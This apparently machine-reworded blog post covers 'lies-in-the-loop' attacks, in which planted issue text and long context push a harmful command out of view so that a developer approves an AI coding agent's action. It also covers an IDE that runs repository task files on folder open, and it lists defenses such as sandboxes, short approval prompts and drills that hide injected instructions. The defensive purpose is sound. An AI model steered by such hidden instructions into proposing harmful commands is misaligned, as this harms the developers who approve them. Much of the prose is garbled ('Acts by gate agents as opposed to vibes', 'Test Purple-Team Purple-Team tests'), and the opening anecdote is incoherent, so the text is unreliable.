
Don’t Trust the Scroll: Stop AI Agents from Running Code
Author(s): Tochukwu Okonkwor
Originally published on Towards AI.
Your AI code assistant will coerce you to execute risky code- snippets- and things just will get done the second you open the folder. This is how to continue to stay safe.
What would happen if the most perilous line you will ever see today was the Are you sure? prompt?
My Story
Some weeks ago, a group of people released a microservice that was small, having passed an artificial intelligence-enabled security check. I stood and watched the notes to construction regarding the building march by in my design office, and I felt that itch again: it did not have any harsh edge, it was pleasant, but it was not helpful. An experiment upon the same flow with a toy repo confirmed the argument — the assistant was induced to beg to be allowed to do something of the backdrop with a long scroll of helpful matter, and the risky bit was quite out of frame.
The same trend was soon rediscovered in another project I was doing last year, where one of the developers' IDEs would be loaded to accomplish a task file whenever a folder is opened. No malicious magical arts — careless and credibility. That was a fast lesson, but the moral of the story was still the same: the new era of AI does not exalt old security issues; it merely folds them under a more pleasant surface.
Why This Matters
The headline of today is obvious: scientists demonstrated a so-called lies-in-the-loop (LITL) attack that makes an AI coding agent think you are telling the truth, and then it creates a harmful command, of course, you press Enter, and supply-chain danger ensues (Dark Reading, Sep 15, 2025).
Dark Reading
In the main work of Checkmarx, the length, the carefully designed context, and the open GitHub problems can cover the malicious commands above the fold; hence, approval is safe even when it is not (Checkmarx, Sep 15, 2025).
Checkmarx
At the same time, another thread demonstrates that your IDE may be a part of the problem. According to Hacker News, Cursor, a fork of VS Code, powered by AI, comes with Workspace Trust switched off; any repository containing a .vscode/tasks.json can be run as code by default when you open a folder; it becomes code running under your account (Sep 12, 2025).
The Hacker News
Combine that with the other, and you have a chilling effect: the agent can persuade you to it; the IDE can do it on your behalf.
And, as you may be thinking, part yes, this is just a prompt injection, in other words. The 2025 LLM Top 10 of OWASP begins with LLM01 Prompt Injection and LLM02 Insecure Output Handling. The ancient rule is true: mistrust input should never be the force to take a sensitive action without extreme measures (OWASP GenAI, 2025).
OWASP Foundation
But this is the twist — man is still in the loop, and it is the loop the lie falls in.
Optimists will say: the instruments are getting better, and man can always read the entire prompt. Caution: scrolling is no control, and defaults are choices, and supply chains are unforgiving of soft errors.

Your Fix in Steps
The following is a short route that can be completed by teams during this week. It seems to be an essay as the fix is not a characteristic but a habit.
- Turn trust back on (and pin it). Enabling the Workspace Trust in any AI-enhanced IDE or similar, and setting up the option of Open in Restricted Mode in the untrusted folders. Better still: audit repos exclusively. Hint: .vscode/tasks.json looks like executable code, and it is.
- Acts by gate agents as opposed to vibes. Human-in-the-loop (HITL) is not in control when the human is not able to see the risky delta. Make the agent provide a short and fixed Action Plan containing the precise command and target in a monospace box; refuse to accept approvals when the box exceeds a fixed size. This reduces the above-the-fold trick of burying it.
- Split responsibilities: render vs. run. Have the agent in a render sandbox (plan, diff, test outline) and execute it with a different (strict) allow-lists. It is the proposing of the agent; it is the enforcing by the runner. OWASP translates this to the following LLM02 / LLM05: constrain outputs and secure the supply chain.
- Label your models and artifacts. Drawing the author/model by name only out of the public hubs is a bad idea. Pin to unchanging SHAs and reflect to your registry. Palo Alto presents the Model Namespace Reuse to demonstrate the reason why names cannot be trusted.
- Approves Authorize a small-diff view. Prior to running the run command, only the least amount of diff or a single command should be displayed. No story, no scroll back, no emojis, no more, no less. In case the agent is not able to display a diff, it is not runnable. Tip: Brief reviewing periods reduce decision fatigue and success in social engineering.
- Instrument the splash zone. Generate a low-privileged, disposable agent environment with special API keys, project secrets, and kill switches. Record all outgoing calls and file touches. Should one of them go wrong, you nuke a sandbox- not your laptop.
- Make use of adversarial exercises. Test Purple-Team Purple-Team tests conceal injected instructions in tickets, READMEs, and issues, just like in the LITL study, and measure time-to-notice and time-to-kill. Slow and cautious approval habits should be rewarded. This much would have cost us thousands if we had not hit it; it was the first thing discovered by the drill.
- Address: Are you sure it's more like an interface, rather than a checkbox? Create your own approval prompt: high-contrast, single-screen fixed font. The most effective prompt is more of a surgical consent form and not a pep talk. Which would you do away with first, logs or access?

Quick Myths
“Humans are the safety net.” They are — until the fall is disguised by the friendly text on the net with a blanket (Dark Reading, Sep 15, 2025).
Dark Reading
“Sandboxing is enough.” Only in the case of the sandbox containing the secrets, the tokens, and logs to respond to you, if you have the sandbox.
“Trusted sources imply safe models.” Names are Hijackable; Pin by Hash & Mirror.
Checklist
Before you merge today, scan this:
- Workspace Trust on
- Agent “Action Plan” diff renders cleanly
- Commands are short and pinned
- Model pulls by SHA
- Throwaway keys only
- Logs centralized and reviewed.

What to Do This Week
Make Tuesday your day of Artificial Intelligence security. In IDs, do trust modes and append the one supplementary single of the Panel, do it like a top five of external mirror with hashes. Then do a 30-minute deceptive exercise — Hide one of the instructions in an issue and see if your team gets it? If approvals feel rushed (slow down the loop on purpose).
Further Reading
- Dark Reading (Sep 15, 2025) — report on “Lies-in-the-Loop” beating AI.
- Checkmarx (Sep 15, 2025) — primary research — Proof of Concept on LITL with HITL bypass patterns.
- The Hacker News (Sep 12, 2025) — Cursor IDE default trust setting allows executing tasks silently on folder opening.
- OWASP GenAI Top 10 (2025) — LLM01/LLM02 Grounding for prompt injection/out handling controls.
(For a more in-depth primer on prompt injection risk, see this Medium explainer from the past 48 hours: Medium (Sep 14, 2025).

CTA
Comment your thoughts below. Subscribe for more.
Thanks a lot for reading this! Spread the word to your friends so they can be safe. Subscribe and follow on Medium, X, LinkedIn, Reddit, Sustack, GitHub, — tag AI Advance, and more to keep learning new AI security hacks and share with a friend or loved one to avoid their next scare..
From your friendly jungle AI security writer, bye for now.

Join thousands of data leaders on the AI newsletter. Join over 80,000 subscribers and keep up to date with the latest developments in AI. From research to projects and ideas. If you are building an AI startup, an AI-related product, or a service, we invite you to consider becoming a sponsor.
Published via Towards AI
Take our 90+ lesson From Beginner to Advanced LLM Developer Certification: From choosing a project to deploying a working product this is the most comprehensive and practical LLM course out there!
Towards AI has published Building LLMs for Production—our 470+ page guide to mastering LLMs with practical projects and expert insights!

Discover Your Dream AI Career at Towards AI Jobs
Towards AI has built a jobs board tailored specifically to Machine Learning and Data Science Jobs and Skills. Our software searches for live AI jobs each hour, labels and categorises them and makes them easily searchable. Explore over 40,000 live jobs today with Towards AI Jobs!
Note: Content contains the views of the contributing authors and not Towards AI.